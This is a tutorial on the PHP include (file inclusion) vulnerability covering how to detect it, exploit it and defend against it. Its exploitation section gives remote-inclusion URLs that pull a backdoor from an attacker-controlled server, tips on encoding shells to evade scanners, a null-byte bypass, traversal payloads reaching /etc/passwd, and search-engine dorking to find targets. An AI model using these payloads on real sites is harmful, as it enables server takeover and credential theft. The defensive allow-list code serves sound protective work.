PHP Include flaw, what is it and how to protect against it?


Last updated: January 1, 2023

In previous tutorials we covered the upload flaw and the XSS flaw. Today I present the PHP include flaw, probably the best-known PHP vulnerability in the world of websites. It comes down to a programming error by a developer who paid little attention to security: a value taken from the request is passed straight to include().

We will look in detail at how this flaw is exploited and, of course, how to protect yourself against it.

And no, this article will not self-destruct in five seconds :), so take the time to read it and learn more about the PHP include flaw.

PHP include: what is it?

As its name suggests, this function includes one page in another. It is used like this:

<?php
include('page.php');
?>

Example

If all your pages need mysql.php, which contains the database connection settings, it is simpler to include that file in each page than to retype the contents of mysql.php everywhere.

The PHP include function lets you keep a single mysql.php page that every page of your site includes (the same goes for the menu, header and footer).

How does PHP Include work?

Imagine we have an index.php page with the following code:

<?php
if (isset($_GET['page']))   // a page was requested in the query string
    include($_GET['page']); // the user-controlled value is used directly as the path
else
    include('default.php');
?>

If we request: index.php?page=tips.php

this code includes (and runs) the tips.php page. So far, nothing complicated.
Now what happens if we request the following URL:
index.php?page=http://www.google.fr

PHP fetches the Google page and includes it, so it is displayed by our server, and any PHP code it contained would be executed there. Now imagine that the page in question is a backdoor such as c99.php: we can then take control of the hosting server, list all its files, edit or create them, access the database, and so on. This only works as long as the server allows including files from another host; we come back to that in the protection section.

Detecting a PHP include flaw

To detect a PHP include flaw on a website, test every parameter of the URL one by one and watch the result. The aim is not to crash the site but to make it try to include a page that does not exist.
If the parameter is vulnerable (and error display is on), we get PHP warnings like these:

  • Warning: main([INCORRECT_PARAMETER]): failed to open stream: No such file or directory in [PAGE_PATH].php on line [LINE_NUMBER]
  • Warning: main(): Failed opening '[INCORRECT_PARAMETER]' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in [PAGE_PATH].php on line [LINE_NUMBER]

Recent PHP versions print include(...) or require(...) instead of main(...), and PHP 8 capitalises the first message as "Failed to open stream"; the shape is otherwise the same. If display_errors is off you will see nothing at all, which does not mean the page is safe.

Type one of these two warnings into a search engine and you will find what you are looking for! 😀 You can always try, but be aware that testing a site you do not own is illegal!
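To make the detection step concrete, here is an added example (not code from the original article) that builds the probe URL and classifies a response body by the warnings quoted above. The response bodies are constructed for the demo, and fetching the probe URL is left to curl or file_get_contents(); the canary value and the cible.com URL are assumptions.

```php
<?php
// Added example, not code from the original article: classify an HTTP
// response body by the include()/main() warnings quoted above. The sample
// bodies below are constructed; nothing is fetched from the network.
declare(strict_types=1);

/**
 * Return the parameter value PHP complained about, or null when the body
 * carries no include/require warning. Matches the old "main(...)" wording
 * as well as modern "include(...)"/"require(...)", and both spellings of
 * "failed to open stream" (PHP 8 capitalised the message).
 */
function includeWarning(string $body): ?string
{
    $text = strip_tags($body); // html_errors=On wraps parts of the warning in <b> tags
    $patterns = [
        '/Warning:\s*(?:main|include|require)(?:_once)?\(([^)]*)\):\s*failed to open stream/i',
        '/Warning:\s*(?:main|include|require)(?:_once)?\(\):\s*failed opening \'([^\']*)\' for inclusion/i',
    ];
    foreach ($patterns as $re) {
        if (preg_match($re, $text, $m) === 1) {
            return $m[1];
        }
    }
    return null;
}

/**
 * Build the probe: the same URL with $param replaced by a name that cannot
 * exist on the server, so a vulnerable page is forced to warn.
 */
function probeUrl(string $url, string $param, string $canary = 'zz_no_such_page_zz'): string
{
    $p = parse_url($url);
    parse_str($p['query'] ?? '', $query);
    $query[$param] = $canary;
    return sprintf('%s://%s%s?%s', $p['scheme'], $p['host'], $p['path'] ?? '/', http_build_query($query));
}

// Constructed sample responses (not captured from any real site).
$samples = [
    'vulnerable (PHP 8)' => "<br />\n<b>Warning</b>:  include(zz_no_such_page_zz): Failed to open stream: No such file or directory in <b>/var/www/index.php</b> on line <b>3</b><br />",
    'vulnerable (PHP 4)' => "Warning: main(zz_no_such_page_zz): failed to open stream: No such file or directory in /var/www/index.php on line 3",
    'not vulnerable'     => "<html><body>Page not found</body></html>",
];

echo probeUrl('http://cible.com/index.php?page=tips', 'page'), "\n";
foreach ($samples as $label => $body) {
    $hit = includeWarning($body);
    printf("%-20s %s\n", $label, $hit === null ? 'no include warning' : "warning names '$hit'");
}
```

A match on the canary name is strong evidence that the parameter reaches include(); a page that merely echoes the value back, or that returns a generic 404, gives no match, and a server with display_errors off gives no match either, so absence of a warning is not proof of safety.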

How to exploit this flaw

Exploiting the include flaw remotely

First, you need a ready-made PHP script (a backdoor).

Search for a specific backdoor such as r57, c99, c100 or myshell. It is better to base64-encode it so that signature-based scanners on the hosting side do not detect it.

Let's say you have found the PHP include flaw on a PHP website and it lets you include any page. All that remains is to host your backdoor on an FTP server or on a free host that does not run PHP. The host must not execute PHP: if it did, it would serve the backdoor's output rather than its source, and the vulnerable site would have no code to run.

Whichever you choose, call the vulnerable page like this:
index.php?page=http://votre-serveur.com/porte-derobee.php
(if it is on an FTP server, replace http:// with ftp:// and put the login and password in the URL in the usual way, ftp://login:password@votre-serveur.com/porte-derobee.php).

And your backdoor appears as follows:

Backdoor interface

Sometimes we come across a vulnerable page whose code differs from the one in the previous paragraph, for example:

<?php
if (isset($_GET['page']))
    include($_GET['page'] . '.php'); // a fixed extension is appended to the value
else
    include('default.php');
?>

Here the ".php" extension is appended to the variable automatically. Our porte-derobee.php becomes porte-derobee.php.php, which does not exist, so it does not run on the vulnerable server.

What now?

There is a very simple way around this filter: the null byte technique. It consists of putting a URL-encoded null byte (%00) at the end of our value. We therefore include:
index.php?page=http://notre-serveur.com/porte-derobee.php%00

Explanation

include() is ultimately handled by C code, and in C the end of a string is marked by a null byte (\x00). The string porte-derobee.php\x00.php is therefore cut off at the null byte, and the ".php" appended by the script is never seen. Be aware that this only works on PHP older than 5.3.4: since that version the file functions, include() among them, reject any path that contains a null byte, so against a current server the trick fails and the appended extension stays.

The local include flaw

So far we have only tried to include a remote backdoor. But be aware that this flaw can just as well be used to execute a file already present on the vulnerable server! This is sometimes the only option, because some protections disable including code from another server.

We can therefore display any page under the site's directory, like this: http://www.cible.com/index.php?page=/test/test.php
and in the same way walk through every directory of the site, and even of the server, as far as file permissions allow (the file must be readable by the user the web server runs as). A relative value is resolved from the directory of index.php (or from the include_path); a value starting with / is taken from the root of the filesystem.

In practice it is simple: we try to guess which directory holds an interesting file such as .htpasswd, testing values like "../.htpasswd", "../../.htpasswd" or "../folder/.htpasswd" one after the other.

Or we go back up to the root of the server and then down into the directory that interests us until we reach a sensitive file, for example:

http://cible.com/index.php?page=../../../../../../../etc/passwd

Adding more "../" than needed does no harm: once at /, another ".." stays at /, so a long run of them reaches the root whatever the starting depth.

Once the password files have been retrieved, they can be cracked with a suitable program such as John the Ripper or Cain.

Here are other files worth a visit, even if some of them (like /etc/shadow) are readable only by root:

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user

Protecting yourself from the include vulnerability

The best ways to protect yourself from the PHP include flaw are:

  • Checking the value on every page of your site. It is tedious, but nothing beats it; the request value is compared against the pages you know, and never used as a path itself:
    <?php
    if ($page == 'tips') { include('tips.php'); }
    elseif ($page == 'photos') { include('photos.php'); }
    ...
    else { include('index.php'); }
    ?>
  • On PHP 4, setting allow_url_fopen to Off. It controls whether the file functions may open files located on another server, and on PHP 4 that also covers include().
  • On PHP 5.2 and later, setting allow_url_include to Off (the default). This is an improvement over PHP 4: it separates files that are read (fopen, file_get_contents, still governed by allow_url_fopen) from files that are included, so the second can be forbidden while the first stays allowed. The directive is deprecated since PHP 7.4 and should simply stay off.

Note that the two php.ini settings only stop remote inclusion; the local include attack described above still works unless the value is validated as in the first point.
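Putting the first point into practice, here is an added example (not code from the original article) of a hardened index.php dispatcher. It also addresses the local traversal shown earlier (../../../etc/passwd): the request value is only ever a key into an allow-list, never a path, and the resolved file is checked with realpath() to lie inside the pages directory as a second line of defence. The pages/ directory, the file names and the use of PHP 8 (str_starts_with, the mixed type) are assumptions.

```php
<?php
// Added example, not code from the original article: hardened dispatcher.
// The ?page= value selects an entry of an allow-list; it is never used as
// a path fragment, so neither remote URLs nor ../ sequences can reach
// include(). Directory and file names are assumptions.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// Allow-list: ?page=tips selects pages/tips.php; any other value is rejected.
const PAGES = [
    'tips'    => 'tips.php',
    'photos'  => 'photos.php',
    'default' => 'default.php',
];

/**
 * Map the request value to an absolute path under PAGE_DIR, or return null
 * when it is not a string, is not in the allow-list, or resolves outside
 * PAGE_DIR.
 */
function resolvePage(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; refuse anything that is not a string.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // realpath() returns false for missing files and collapses '..' and
    // symlinks, so the containment check below is on the real location.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

/**
 * Remote inclusion must stay disabled in php.ini (allow_url_include=Off,
 * the default). Refuse to serve anything if it has been switched on.
 */
function remoteIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remoteIncludeEnabled()) {
    http_response_code(500);
    exit('allow_url_include is on; fix php.ini');
}

$page = resolvePage($_GET['page'] ?? 'default');
if ($page === null) {
    // Unknown page: fail closed rather than fall back to a guessed file.
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Compared with the vulnerable version, a request for ?page=../../../../etc/passwd or ?page=http://www.google.fr is rejected by the array_key_exists() check before realpath() is even consulted; the realpath() containment check exists only to catch a bad entry in the allow-list or a symlink planted under pages/.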

As with every article, I hope I have met your expectations and brought you something new with this post. I also hope that all webmasters are now aware of how dangerous this flaw is.